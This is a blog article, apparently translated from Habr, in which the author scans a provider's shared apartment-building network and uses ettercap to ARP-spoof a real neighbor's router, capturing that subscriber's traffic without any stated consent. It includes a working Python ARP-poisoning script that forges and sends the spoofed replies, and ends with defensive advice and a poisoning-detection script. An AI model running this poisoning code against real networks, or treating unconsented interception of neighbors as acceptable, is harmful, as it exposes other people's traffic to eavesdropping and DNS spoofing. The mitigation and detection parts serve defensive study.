MITM attack on the scale of an apartment building

Many companies today are concerned with the information security of their infrastructure; some because regulations require it, others from the moment their first incident happens. Recent trends show that the number of incidents is growing and the attacks themselves are becoming more sophisticated. But you do not have to look far: the danger is much closer. This time I would like to raise the topic of ISP security. On Habr there are posts that discussed it at the application level; this article focuses on security at the network and link layers.

How it all began

Some time ago the apartment got Internet access from a new provider; before that it had been served over ADSL. Since I spend little time at home, mobile Internet was in more demand than the home connection. With the move to remote work I decided that 50-60 Mbit/s was simply not enough and wanted more. For technical reasons the ADSL line could not go above 60 Mbit/s, so I decided to switch to another provider offering a higher advertised speed over something other than ADSL.

It could have been different

I contacted a representative of the provider. The installers came, drilled a hole into the apartment and ran in a cable terminated with an RJ-45 plug. They handed me a contract and a sheet with the network settings to enter on the router (a dedicated IP address, gateway, subnet mask and the addresses of their DNS servers), took payment for the first month and left. As soon as I entered those settings into my home router, the Internet was in the apartment. The procedure for bringing a new subscriber onto the network seemed far too simple to me: no initial authentication of any kind took place, and my only identifier was the IP address I had been given. The Internet worked fast and stably. A Wi-Fi router served the apartment, and the connection speed dropped a little through a load-bearing wall. One day I needed to download a file of a couple of dozen gigabytes, and I thought: why not plug the cable coming into the apartment straight into the PC?

Know thy neighbor

After the whole file had downloaded, I decided to get to know my neighbors on the switch ports better.

In apartment buildings, in the most basic scheme, the provider's connection arrives over fiber, terminates on one of the switches in the switching closet, and is distributed to the entrances and apartments over Ethernet cable. Yes, there is already technology that brings fiber straight into the apartment (GPON), but it is not yet that widespread.

A very simplified topology on the scale of one building looks something like this:

[Figure: simplified topology of one building: fiber uplink into the switching closet, Ethernet from the switch to each apartment]

It turns out that this provider's clients, some of the neighboring apartments, sit in the same local network on the same switching equipment.

By capturing on the interface connected directly to the provider's network, you can see ARP broadcast traffic arriving from every host on the segment.

[Screenshot: packet capture showing ARP broadcasts from hosts on the segment]

The provider had decided not to bother dividing the network into smaller segments, so broadcast traffic from up to 253 hosts, minus those that were switched off, could travel within a single switch, consuming bandwidth on every port and leaving every subscriber directly reachable at the link layer by every other.

A scan with nmap determined the number of active hosts across the whole address pool, as well as the software version and open ports of the main switch:

[Screenshots: nmap output: active hosts in the address pool, and the main switch's software version and open ports]

And where there is ARP, ARP spoofing is not far away

For the next steps the graphical ettercap utility (ettercap-graphical) was used. There are more modern alternatives, but this tool is attractive for its simple graphical interface and ease of use.

The first column lists the IP addresses of all routers that responded to the ping sweep; the second lists their physical (MAC) addresses.

A MAC address is unique to the device: its vendor prefix (OUI) identifies the manufacturer, and it can be correlated with other data sources to profile the router, so the MAC addresses are masked in this article.

[Screenshot: ettercap host list with IP and MAC addresses]

As target 1 we add the default gateway, 192.168.xxx.1; as target 2 we add one of the other addresses.

We then introduce ourselves to the gateway as the host with address 192.168.xxx.204 but with our own MAC address, and to the subscriber's router as the gateway 192.168.xxx.1, again with our own MAC. This works because ARP has no authentication: a host accepts an unsolicited "is-at" reply and overwrites its cache entry with whatever MAC the reply claims. The details of this weakness of the ARP protocol are covered in other easily found articles.

[Screenshot: ettercap with the gateway and the victim selected as targets]

As a result of all these manipulations, after enabling packet forwarding on our machine, the host's traffic passes through us:

[Screenshots: the victim's traffic captured as it passes through the attacking machine]
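To make the ettercap steps above concrete, here is an added example (not code from the original article or from ettercap) that builds the same two forged ARP "is-at" replies by hand and parses them back, so you can see exactly what each victim's ARP cache is told. The addresses and MACs are made up: 192.168.1.x stands in for the article's 192.168.xxx.x, and de:ad:be:ef:00:01 is the assumed attacker MAC. Actually putting frames on the wire needs a raw socket and root (see send_frame), and net.ipv4.ip_forward must be 1 or the victim simply loses connectivity instead of being relayed.

```python
"""Added example: forging the two ARP replies an ARP-poisoning run sends.
Addresses are constructed for illustration; nothing here is sent unless
send_frame is called explicitly."""
import socket
import struct

ETH_P_ARP = 0x0806   # EtherType for ARP
ARP_REPLY = 2        # ARP opcode "is-at"


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_ip: str, sender_mac: str,
                    target_ip: str, target_mac: str) -> bytes:
    """Ethernet II frame carrying an ARP reply that claims
    'sender_ip is at sender_mac'. ARP never authenticates this claim."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1,            # hardware type: Ethernet
                      0x0800,       # protocol type: IPv4
                      6, 4,         # hardware / protocol address lengths
                      ARP_REPLY,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode a raw Ethernet+ARP frame back into its fields (what a victim sees)."""
    _dst, _src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _hw, _proto, _hl, _pl, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"op": op,
            "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa)}


def poison_pair(gateway_ip: str, gateway_mac: str,
                victim_ip: str, victim_mac: str, attacker_mac: str):
    """The two frames a poisoner repeats every few seconds: tell the gateway
    that victim_ip lives at attacker_mac, and tell the victim that gateway_ip does."""
    to_gateway = build_arp_reply(victim_ip, attacker_mac, gateway_ip, gateway_mac)
    to_victim = build_arp_reply(gateway_ip, attacker_mac, victim_ip, victim_mac)
    return to_gateway, to_victim


def send_frame(frame: bytes, iface: str) -> None:
    """Linux only; needs CAP_NET_RAW. Enable forwarding first:
    sysctl -w net.ipv4.ip_forward=1"""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


if __name__ == "__main__":
    to_gw, to_victim = poison_pair("192.168.1.1", "00:11:22:33:44:01",     # gateway (constructed)
                                   "192.168.1.204", "00:11:22:33:44:cc",   # victim (constructed)
                                   "de:ad:be:ef:00:01")                    # attacker (constructed)
    print("gateway will learn:", parse_arp(to_gw))
    print("victim will learn: ", parse_arp(to_victim))
```

Both frames are unicast to the respective victim's real MAC, which is why the other hosts on the segment, and the switch's CAM table, see nothing unusual: the switch still forwards by destination MAC, and only the two ARP caches have been lied to.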

Yes, HTTPS is used almost everywhere now, but the network is still full of other insecure protocols: DNS, for instance, which a DNS spoofing attack can target once traffic flows through the attacker. The mere fact that a MITM attack is possible opens the way to many other attacks, and it gets worse when several dozen active hosts are reachable on the segment. Keep in mind that this is a residential network, not a corporate one, and not everyone has protections for detecting and countering the attacks that follow.

How to avoid it

The provider should be the one worried about this problem; configuring protection against such attacks is very easy, for instance on the same Cisco switch.

[Screenshot: Cisco switch configuration for protection against ARP spoofing]

Enabling Dynamic ARP Inspection (DAI) would prevent spoofing the MAC address of the main gateway. One caveat: DAI validates ARP replies against the DHCP snooping binding table, so on a segment with statically assigned addresses like this one it also needs ARP ACLs (or static bindings) stating which IP belongs to which MAC on which port. Breaking the broadcast domain into smaller segments, or isolating subscriber ports from one another (protected ports or private VLANs), would at least stop ARP traffic from reaching every host and shrink the set of hosts that can be attacked. The client, in turn, can protect himself from such manipulation by setting up a VPN directly on the home router, which most devices already support; the poisoning still happens, but the attacker then sees only the encrypted tunnel. A static ARP entry for the gateway on the router is a cheaper partial measure: it keeps the router's own cache from being poisoned, though not the gateway's.
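Since a subscriber cannot rely on the provider enabling DAI, the following added example (not from the original article) shows the kind of arpwatch-style check that can run on a home router or PC: it parses `ip neigh show` output, remembers the MAC first seen for each IP, and raises on the two symptoms of the poisoning described above, the gateway's MAC changing and one MAC claiming several IPs. The neighbor-table lines are constructed samples, 192.168.1.1 is the assumed gateway, and de:ad:be:ef:00:01 is the assumed attacker MAC.

```python
"""Added example: detecting ARP poisoning from the host's neighbor table.
Sample `ip neigh show` lines below are constructed, not captured."""
import re
from collections import defaultdict

# One `ip neigh show` line: "<ip> dev <iface> lladdr <mac> <state>"
NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-f:]{17})", re.I)


def parse_ip_neigh(line: str):
    """Return (ip, mac) for a line with a MAC; None for FAILED/INCOMPLETE entries."""
    m = NEIGH_RE.match(line.strip())
    if not m:
        return None
    return m.group(1), m.group(3).lower()


class ArpWatch:
    """Tracks IP-to-MAC bindings and reports changes that indicate poisoning."""

    def __init__(self, gateway_ip: str):
        self.gateway_ip = gateway_ip
        self.seen = {}                    # ip -> mac currently believed
        self.by_mac = defaultdict(set)    # mac -> set of IPs it has claimed

    def observe(self, ip: str, mac: str):
        mac = mac.lower()
        alerts = []
        prev = self.seen.get(ip)
        if prev is not None and prev != mac:
            kind = "GATEWAY_MAC_CHANGED" if ip == self.gateway_ip else "MAC_CHANGED"
            alerts.append((kind, ip, prev, mac))
            self.by_mac[prev].discard(ip)
        self.seen[ip] = mac
        if ip not in self.by_mac[mac]:
            self.by_mac[mac].add(ip)
            # A poisoner answers for the gateway and the victim with the same MAC.
            if len(self.by_mac[mac]) > 1:
                alerts.append(("MAC_CLAIMS_MULTIPLE_IPS", mac, tuple(sorted(self.by_mac[mac]))))
        return alerts

    def check_table(self, lines):
        """Feed a whole neighbor table (e.g. output of `ip neigh show`) and collect alerts."""
        alerts = []
        for line in lines:
            parsed = parse_ip_neigh(line)
            if parsed:
                alerts.extend(self.observe(*parsed))
        return alerts


# Constructed samples: the table before and during the poisoning.
BEFORE = [
    "192.168.1.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE",
    "192.168.1.204 dev eth0 lladdr 00:11:22:33:44:cc STALE",
    "192.168.1.77 dev eth0  FAILED",
]
DURING = [
    "192.168.1.1 dev eth0 lladdr de:ad:be:ef:00:01 REACHABLE",
    "192.168.1.204 dev eth0 lladdr de:ad:be:ef:00:01 REACHABLE",
]


def run_demo():
    """Baseline pass yields no alerts; the poisoned table yields three."""
    watch = ArpWatch("192.168.1.1")
    return watch.check_table(BEFORE), watch.check_table(DURING)


if __name__ == "__main__":
    baseline, poisoned = run_demo()
    print("baseline alerts:", baseline)
    for alert in poisoned:
        print("ALERT:", alert)
```

In practice you would poll `ip neigh show` (or a packet capture of ARP replies) every few seconds and page on a GATEWAY_MAC_CHANGED alert; a legitimate gateway replacement is rare enough that the false-positive rate is acceptable for a home network.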

Conclusions

Most likely, providers do not care about this; all effort goes into growing the customer base. This material was written not to demonstrate the attack but to remind you that even your provider's network may not be a very safe place for your data. I am sure there are many small regional ISPs that have done nothing beyond what is needed for the basic operation of their network equipment.

Source: habr.com
